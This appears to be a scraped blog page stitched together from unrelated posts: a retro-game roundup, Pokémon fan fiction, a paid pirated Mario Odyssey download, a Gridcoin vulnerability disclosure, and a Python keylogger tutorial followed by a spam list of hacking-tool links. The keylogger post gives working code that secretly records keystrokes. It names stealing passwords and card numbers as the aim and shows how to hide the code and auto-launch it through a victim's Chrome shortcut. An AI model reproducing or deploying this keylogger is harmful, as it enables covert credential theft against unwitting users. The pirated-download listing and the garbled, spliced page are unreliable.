sábado, 12 de septiembre de 2020

MONTHLY 5 - FEBRUARY 2020

https://collectionchamber.blogspot.com/p/bush-buck-global-treasure-hunter.html https://collectionchamber.blogspot.com/p/fountain-of-dreams.html https://collectionchamber.blogspot.com/p/quarantine-ii-road-warrior.html https://collectionchamber.blogspot.com/p/simhealth.html https://collectionchamber.blogspot.com/p/william-shakespeares-romeo-juliet.html

There's a whole world to visit in February's quintet of games. Travel the globe hunting for treasure in the edutainment hidden gem Bush Buck: Global Treasure Hunter (1990, PC Globe Inc). Then take a post-apocalyptic jaunt through Miami in the unofficial sequel to Wasteland that is Fountain of Dreams (1990 Electronic Arts). If you want a more violent foray into the future, check out Quarantine II: Road Warrior (1995 GameTek), an action-driving sequel that's just as gory as the first. If you suffer some wounds on your whirlwind trip, seek the advice of SimHealth: The National Health Care Simulation (1994 Thinking Tools Inc), an obscure entry into Maxis' Sim series. On your way back, stop off at a very romantic location (it is February after all) with William Shakespeare's Romeo + Juliet: An Interactive Trip to Verona Beach (1996 Fox Interactive). Read on to find out more.

Read more »

Monumental Heartbreak

I made it through Viridian Forest to Pewter City safely. The Pewter Pokémon Gym was open and available, but Lucky was in no condition to train there. Instead we made daily forays into the forest to train against other Caterpie and Weedle. Eventually Lucky evolved into a Metapod which was amazing to watch. At the time, I was so excited to see an evolution first hand. It was the direct result of our diligent training together and it felt great to see Lucky move into his next life stage, growing stronger before my eyes. This physical manifestation of growth and improvement encouraged me to take our training to the next step. It encouraged me to take my team to the Pewter City Pokémon Gym.
I walked in headstrong and confident that my team was ready to face the challenges ahead. I announced myself as a challenger. I waited for the trainers representing the gym to step forward. I expected to face more than one young man before challenging Gym Leader Brock, but apparently this young trainer was the only one representing Brock that day. He only had two Pokéballs at his side, but he assured me I was no match for Brock. He was about to prove it to me firsthand.
He tossed out a Diglett which popped up out of the dirt floor of the gym. Kiwi took to the air. If the Diglett knew any ground attacks they would be wasted on Kiwi while he remained airborne. Kiwi opened with our classic Sand-Attack gambit to kick as much dust and dirt up into the Diglett's eyes as he could. Kiwi took a few scrapes as he wore down the Diglett's accuracy, but eventually the Diglett was completely ineffective. I switched in Nibbles to tackle the Diglett into submission.
The Junior Trainer revealed his final Pokémon to be a Sandshrew. Its defense was formidable so I used Nibble to distract him with a series of disorienting glares before pulling Nibble out of the battle. Rascal jumped in to eagerly sweep through the defenseless Sandshrew, but I miscalculated. After two vicious slashes from the Sandshrews sharp claws, Rascal was down and out. Rascal slumped to the ground unconscious. My heart sank into my stomach and I felt faint. I failed Rascal.
It was in that moment of horrible defeat that it occurred to me that I should have used a potion on Rascal. I shouldn't have let him suffer those two powerful attacks head on. I should have sent in Kiwi to wear down the Sandshrew's accuracy. Lucky didn't stand a chance against this Pokémon if it took out Rascal so easily. Kiwi was my only chance to get out of this mess. I knew that if I didn't keep my head in the game, I might be saying goodbye to more than one Pokémon that afternoon. I tried to shake off my sorrow and focus on the battle ahead.
Kiwi was much faster than the Sandshrew. He kept firmly out of reach and launched a series of quick attacks on the Sandshrew to finish it off. The Junior Trainer conceded defeat, but it was I who felt defeated that day. This young boy had no idea I'd just recently vowed to never fight my Pokémon to the point of unconsciousness. Now, just days after determining the way I wished to train and respect Pokémon, my resolve was going to be tested. Rascal and I would have to part ways.
I explained this to the trainer who didn't quite understand, but he said the gym would be happy to watch after Rascal for me. Rascal was always enthusiastic about training and living here at the gym would be a fitting end to our relationship, so I agreed.
I took Rascal to the Pokémon Center and waited for him to recover from his injuries. I don't really know if he understood, but I explained to him that in order for us to grow stronger I would need to let him go. We had to follow different paths, now. I had chosen a training style where I would not let my Pokémon fall in battle and even though Rascal was my very first Pokémon companion, I could not go back on my conviction. We said our goodbyes. I released Rascal to the care of the Junior Trainer at the Pewter City Pokémon Gym and withdrew my challenge.

It's an understatement to say that I was devastated. In that moment, I certainly regretted making it my personal goal as a trainer to not push my Pokémon too far. As Wolf had said, it's just part of the training to the average trainer. You win some and you lose some. But that just wasn't my way. I wanted to build a place where I could protect Pokémon and people would come from all around to study and understand them better. I had to be better than the average trainer. I had to hold myself to a higher standard. Pokémon would fight. They would fight to protect me in the wild, and they would fight for my dream in competitive matches. But I had to have limits. I had to take responsibilities for my failures and this was the only way I knew how to do that.
Rascal was the first of many such failures, and saying goodbye to my first Pokémon was certainly one of the most painful experiences as a Pokémon Trainer that I have ever faced. Back in those days in Pewter City, I questioned everything about my journey. I spent a long time just wondering if I should return to Professor Oak and give up. These thoughts just stemmed from the profound sadness and disappointment, though. Ultimately, I would move on. I would grow stronger and persevere.
Beyond the tremendous heartbreak of failing to protect my first Pokémon, I was also terrified of Brock. This failure humbled me tremendously. Everything I did going forward would be taken slowly and with greater attention to strategy. This included returning to challenge Brock. Without Rascal, my team had a gaping hole that needed to be filled. The only one who could fill that hole was Lucky and so we left Pewter temporarily to train like our lives depended on it. I would absolutely not lose another Pokémon in this city.

Current Team:

viernes, 4 de septiembre de 2020

Download Mario Odyssey For Switch

Download Mario Odyssey for Switch



 Download

 Download Super Mario Odyssey With Direct Link

 Download Part 1
 Download Part 2
 Download Part 3


 File Size : 5.4 GB
 Each Part Size : 2 GB 
Price : 10$
Password: After 10$ payment is done


lunes, 31 de agosto de 2020

Gridcoin - The Bad

In this post we will show why Gridcoin is insecure and probably will never achieve better security. Therefore, we are going to explain two critical implementation vulnerabilities and our experience with the core developer in the process of the responsible disclosure. 
    In our last blog post we described the Gridcoin architecture and the design vulnerability we found and fixed (the good). Now we come to the process of responsibly disclosing our findings and try to fix the two implementation vulnerabilities (the bad).

    Update (15.08.2017):
    After the talk at WOOT'17 serveral other developers of Gridcoin quickly reached out to us and told us that there was a change in responsibility internally in the Gridcoin-Dev team. Thus, we are going to wait for their response and then change this blog post accordingly. So stay tuned :)

    Update (16.08.2017):
    We are currently in touch with the whole dev team of Gridcoin and it seems that they are going to fix the vulnerabilities with the next release.


    TL;DR
    The whole Gridcoin currency is seriously insecure against attacks and should not be trusted anymore; unless some developers are in place, which have a profound background in protocol and application security.

    What is Gridcoin?

    Gridcoin is an altcoin, which is in active development since 2013. It claims to provide a high sustainability, as it has very low energy requirements in comparison to Bitcoin. It rewards users for contributing computation power to scientific projects, published on the BOINC project platform. Although Gridcoin is not as widespread as Bitcoin, its draft is very appealing as it attempts to  eliminate Bitcoin's core problems. It possesses a market capitalization of $13,530,738 as of August the 4th 2017 and its users contributed approximately 5% of the total scientific BOINC work done before October 2016.

    A detailed description of the Gridcoin architecture and technical terms used in this blog post are explained in our last blog post.

    The Issues

    Currently there are 2 implementation vulnerabilities in the source code, and we can mount the following attacks against Gridcoin:
    1. We can steal the block creation reward from many Gridcoin minters
    2. We can efficiently prevent many Gridcoin minters from claiming their block creation reward (DoS attack)
    So why do we not just open up an issue online explaining the problems?

    Because we already fixed a critical design issue in Gridcoin last year and tried to help them to fix the new issues. Unfortunately, they do not seem to have an interest in securing Gridcoin and thus leave us no other choice than fully disclosing the findings.

    In order to explain the vulnerabilities we will take a look at the current Gridcoin source code (version 3.5.9.8).

    WARNING: Due to the high number of source code lines in the source files, it can take a while until your browser shows the right line.

    Stealing the BOINC block reward

    The developer implemented our countermeasures in order to prevent our attack from the last blog post. Unfortunately, they did not look at their implementation from an attacker's perspective. Otherwise, they would have found out that they conduct not check, if the signature over the last block hash really is done over the last block hash. But we come to that in a minute. First lets take a look at the code flow:

    In the figure the called-by-graph can be seen for the function VerifyCPIDSignature.
    1. CheckBlock → DeserializeBoincBlock [Source]
      • Here we deserialize the BOINC data structure from the first transaction
    2. CheckBlock → IsCPIDValidv2 [Source]
      • Then we call a function to verify the CPID used in the block. Due to the massive changes over the last years, there are 3 possible verify functions. We are interested in the last one (VerifyCPIDSignature), for the reason that it is the current verification function.
    3. IsCPIDValidv2 → VerifyCPIDSignature [Source]
    4. VerifyCPIDSignature → CheckMessageSignature [Source, Source]
    In the last function the real signature verification is conducted [Source]. When we closely take a look at the function parameter, we see the message (std::string sMsg)  and the signature (std::string sSig) variables, which are checked. But where does this values come from?


    If we go backwards in the function call graph we see that in VerifyCPIDSignature the sMsg is the string sConcatMessage, which is a concatenation of the sCPID and the sBlockHash.
    We are interested where the sBlockHash value comes from, due to the fact that this one is the only changing value in the signature generation.
    When we go backwards, we see that the value originate from the deserialization of the BOINC structure (MiningCPID& mc) and is the variable mc.lastblockhash [Source, Source]. But wait a second, is this value ever checked whether it contains the real last block hash?

    No, it is not....

    So they just look if the stored values there end up in a valid signature.

    Thus, we just need to wait for one valid block from a researcher and copy the signature, the last block hash value, the CPID and adjust every other dynamic value, like the RAC. Consequently, we are able to claim the reward of other BOINC users. This simple bug allows us again to steal the reward of every Gridcoin researcher, like there was never a countermeasure.

    Lock out Gridcoin researcher
    The following vulnerability allows an attacker under specific circumstances to register a key pair for a CPID, even if the CPID was previously tied to another key pair. Thus, the attacker locks out a legit researcher and prevent him from claiming BOINC reward in his minted blocks.

    Reminder: A beacon is valid for 5 months, afterwards a new beacon must be sent with the same public key and CPID.

    Therefore, we need to take a look at the functions, which process the beacon information. Every time there is a block, which contains beacon information, it is processed the following way (click image for higher resolution):


    In the figure the called-by-graph can be seen for the function GetBeaconPublicKey.
    We now show the source code path:
    • ProcessBlock → CheckBlock [Source]
    • CheckBlock → LoadAdminMessages [Source]
    • LoadAdminMessages → MemorizeMessages [Source]
    • MemorizeMessages → GetBeaconPublicKey [Source]
    In the last function GetBeaconPublicKey there are different paths to process a beacon depending on the public key, the CPID, and the time since both were associated to each other.
    For the following explanation we assume that we have an existing association (bound) between a CPID A and a public key pubK_A for 4 months.
    1. First public key for a CPID received [Source]
      • The initial situation, when pubK_A was sent and bind to CPID  A (4 months ago)
    2. Existing public key for a CPID was sent [Source]
      • The case that pubK_A was resent for a CPID A, before the 5 months are passed by
    3. Other public key for a CPID was sent [Source]
      • The case, if a different public key pubK_B for the CPID A was sent via beacon.
    4. The existing public key for the CPID is expired
      • After 5 months a refresh for the association between A and pubK_A is required.
    When an incoming beacon is processed, a look up is made, if there already exists a public key for the CPID used in the beacon. If yes, it is compared to the public key used in the beacon (case 2 and 3).
    If no public key exists (case 1) the new public key is bound to the CPID.

    If a public key exists, but it was not refreshed directly 12.960.000 seconds (5 months [Source]) after the last beacon advertisement of the public key and CPID, it is handled as no public key would exist [Source].

    Thus, case 1 and 4 are treated identical, if the public key is expired, allowing an attacker to register his public key for an arbitrary CPID with expired public key. In practice this allows an attacker to lock out a Gridcoin user from the minting process of new blocks and further allows the attacker to claim reward for BOINC work he never did.

    There is a countermeasure, which allows a user to delete his last beacon (identified by the CPID) . Therefore, the user sends 1 GRC to a special address (SAuJGrxn724SVmpYNxb8gsi3tDgnFhTES9) from an GRC address associated to this CPID [Source]. We did not look into this mechanism in more detail, because it only can be used to remove our attack beacon, but does not prevent the attack.

    The responsible disclosure process

    As part of our work as researchers we all have had the pleasure to responsible disclose the findings to developer or companies.

    For the reasons that we wanted to give the developer some time to fix the design vulnerabilities, described in the last blog post, we did not issue a ticket at the Gridcoin Github project. Instead we contacted the developer at September the 14th 2016 via email and got a response one day later (2016/09/15). They proposed a variation of our countermeasure and dropped the signature in the advertising beacon, which would result in further security issues. We sent another email (2016/09/15) explained to them, why it is not wise to change our countermeasures and drop the signature in the advertising beacon.
    Unfortunately, we did not receive a response. We tried it again on October the 31th 2016. They again did not respond, but we saw in the source code that they made some promising changes. Due to some other projects we did not look into the code until May 2017. At this point we found the two implementation vulnerabilities. We contacted the developer twice via email (5th and 16th of May 2017) again, but never received a response. Thus, we decided to wait for the WOOT notification to pass by and then fully disclose the findings. We thus have no other choice then to say that:

    The whole Gridcoin cryptocurrency is seriously insecure against attacks and should not be trusted anymore; unless some developers are in place, which have a profound background in protocol and application security.

    Further Reading
    A more detailed description of the Gridcoin architecture, the old design issue and the fix will be presented at WOOT'17. Some days after the conference the paper will be available online.
    Related links

    domingo, 30 de agosto de 2020

    How To Make A Simple And Powerful Keylogger Using Python

    A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

    How to make a python keylogger?

    A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
    Requirements to create a python keylogger
    • Computer With Operating system: Windows, Mac os or Linux
    • Python must be installed on the system
    • Pip (Python index package ) you will need this to install python software packages.
    • Pypiwin32 and PyHook packages
    • Basic understanding of computers
    You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
    Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
    Download python development kit by clicking here.
    Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
    Step 2:
    Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
    Step 3:
    You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
    To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
    Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
    Now click on the Advanced system settings
    Choose Environment Variables.
    Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
    Click on ok.
    Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
    Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
    Part 3: Creating and testing the python keylogger:
    Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
    Go to the File, from the drop-down menu choose New file.

    Python Keylogger source code:

    Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
    import pyHook, pythoncom, sys, logging
    file_log='F:\\test\\log.txt'
    def onKeyboardEvent(event):
    logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
    hooks_manager=pyHook.HookManager()
    hooks_manager.KeyDown=onKeyboardEvent
    hooks_manager.HookKeyboard()
    pythoncom.PumpMessages()
    Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
    The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
    Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
    Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
    Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
    Read more

    Black Hat Python Free PDF

    Related posts
    1. Hacker Search Tools
    2. Hacking Tools Windows
    3. Hacker Tools Apk Download
    4. Hack Tools For Ubuntu
    5. Computer Hacker
    6. Hacking Tools 2019
    7. Hack Tools For Windows
    8. Hacker Tools List
    9. Hacker Tools Mac
    10. Pentest Tools Windows
    11. Hacking Tools Mac
    12. Hacking Tools For Kali Linux
    13. New Hacker Tools
    14. Hacker Tools Free Download
    15. Pentest Tools For Android
    16. Hack Tools For Ubuntu
    17. Hacker Tools Linux
    18. Pentest Tools For Android
    19. New Hack Tools
    20. Physical Pentest Tools
    21. Hacker Tools 2020
    22. New Hack Tools
    23. Hacking Tools For Pc
    24. Hacking App
    25. Hacking Tools Windows
    26. Hack Apps
    27. Hacking Tools Github
    28. Tools 4 Hack
    29. Hack Tools Online
    30. Hacker Hardware Tools
    31. Hacker Tool Kit
    32. Pentest Box Tools Download
    33. New Hacker Tools
    34. Physical Pentest Tools
    35. Pentest Tools Bluekeep
    36. Pentest Tools Nmap
    37. Best Hacking Tools 2019
    38. Hacking Tools 2019
    39. Hacking Tools And Software
    40. Pentest Tools List
    41. Black Hat Hacker Tools
    42. Hacking Tools
    43. Hack Tools Online
    44. Hacking Tools Mac
    45. Pentest Tools For Windows
    46. Hacking Tools Windows
    47. Hacker Tools Apk
    48. Pentest Tools Kali Linux
    49. Hack Rom Tools
    50. Hack Rom Tools
    51. Hacker Tools Online
    52. Hacker Hardware Tools
    53. Underground Hacker Sites
    54. Game Hacking
    55. Hacker Tools For Mac
    56. Computer Hacker
    57. Hak5 Tools
    58. Hacker Tools List
    59. Hacker Tools Apk
    60. Hacker Search Tools
    61. Hacking Tools For Windows
    62. Hacking Tools
    63. How To Make Hacking Tools
    64. Tools Used For Hacking
    65. Pentest Tools For Windows
    66. Hacker Tools Hardware
    67. Hack Apps
    68. Physical Pentest Tools
    69. Hak5 Tools
    70. Pentest Tools Framework
    71. Hack App
    72. Pentest Tools Apk
    73. Hacking Tools For Pc
    74. Hacking Tools For Mac
    75. Hacking Tools Name
    76. Hak5 Tools
    77. Hacker Tools For Mac
    78. Bluetooth Hacking Tools Kali
    79. Hacking Tools Download
    80. New Hack Tools
    81. Hacking Tools Download
    82. Hacker Techniques Tools And Incident Handling
    83. Hacking Tools Windows
    84. Install Pentest Tools Ubuntu
    85. Termux Hacking Tools 2019
    86. Black Hat Hacker Tools
    87. Free Pentest Tools For Windows
    88. World No 1 Hacker Software
    89. Growth Hacker Tools
    90. Pentest Tools Bluekeep
    91. Hacker Tools List
    92. Hacker Tools Apk Download
    93. Hack Tools Github
    94. Hack Tools For Windows
    95. Hacking Tools For Beginners
    96. Hacking Tools
    97. Pentest Tools For Windows
    98. Hacking Tools 2020
    99. Pentest Reporting Tools
    100. Game Hacking
    101. What Are Hacking Tools
    102. Hack App
    103. Pentest Tools Online
    104. Hack Tool Apk No Root
    105. Hacking Tools Free Download
    106. Hack Tools Download
    107. Hacker
    108. Pentest Tools Nmap
    109. Pentest Tools Url Fuzzer
    110. Pentest Tools Subdomain
    111. Pentest Tools Subdomain
    112. Kik Hack Tools
    113. Hak5 Tools
    114. Termux Hacking Tools 2019
    115. Hack Tools Github
    116. Hacker Tools Software
    117. What Is Hacking Tools
    118. Pentest Tools Website Vulnerability
    119. Hacker Tools Free Download
    120. How To Hack
    121. Hacking Tools For Windows Free Download
    122. Hack Tools Pc
    123. Hacking Tools Mac
    124. Hacking Tools For Pc
    125. Pentest Tools For Windows
    126. Hack Tools Download
    127. Hacker Tools 2020
    128. Best Pentesting Tools 2018
    129. Pentest Tools Linux
    130. Hacking Tools Hardware
    131. Nsa Hack Tools Download
    132. Best Hacking Tools 2020
    133. Hacker Tools Apk
    134. Hack Tools 2019
    135. Hacker Tools Software